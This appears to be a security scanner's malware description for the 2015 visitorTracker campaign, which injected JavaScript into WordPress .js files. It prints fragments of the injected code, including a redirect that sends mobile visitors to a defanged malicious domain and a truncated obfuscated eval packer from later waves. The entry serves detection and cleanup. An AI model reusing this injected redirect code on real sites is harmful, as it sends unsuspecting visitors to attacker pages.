Description:
Detected a malicious JavaScript code specific to the visitorTracker malware campaign that infected a significant number of [mostly] WordPress sites in fall of 2015. The malicious scripts were injected into .js files.
The attack had multiple waves. In each wave the injected code changed.
In the first waves, the code was easily recognizable:
/*visitorTracker*/var visitortrackerin = setInterval(function(){ if(document.body != null && typeof document.body != "undefined"){ clearInterval(visitortrackerin); if(typeof window["globalvisitor"] == "undefined"){ window["globalvisitor"] = 1; var isIE = visitortrackerde(); var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc."; if(visitorTracker_isMob()){ if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))){ location.replace("hxxp://vovinutrysiki[.]gq/052F"); }else{ window.location = "hxxp://vovinutrysiki[.]gq/052F"; document.location = "hxxp://vovinutrysiki[.]gq/052F"; } ...
while the code in the later waves was much more obfuscated...
... /*e030378d3fb3bc6ce2d6d91758d40aa3*/eval(function(p,a,c,k,e,d){e=function(c){return(c<a ...skipped... n10|wonu|o8|oa|mi|rc||cr|me|x700|02|mmef|nw|mwbp|mywa|mt|p1|wmlb|zz|de'.split('|'),0,{})) /*e030378d3fb3bc6ce2d6d91758d40aa3*/
Affecting: WordPress sites and other sites that share hosting accounts with WordPress sites.
More Information: WordPress Malware – Active VisitorTracker Campaign
WordPress Malware – VisitorTracker Campaign Update
How to clean a hacked WordPress site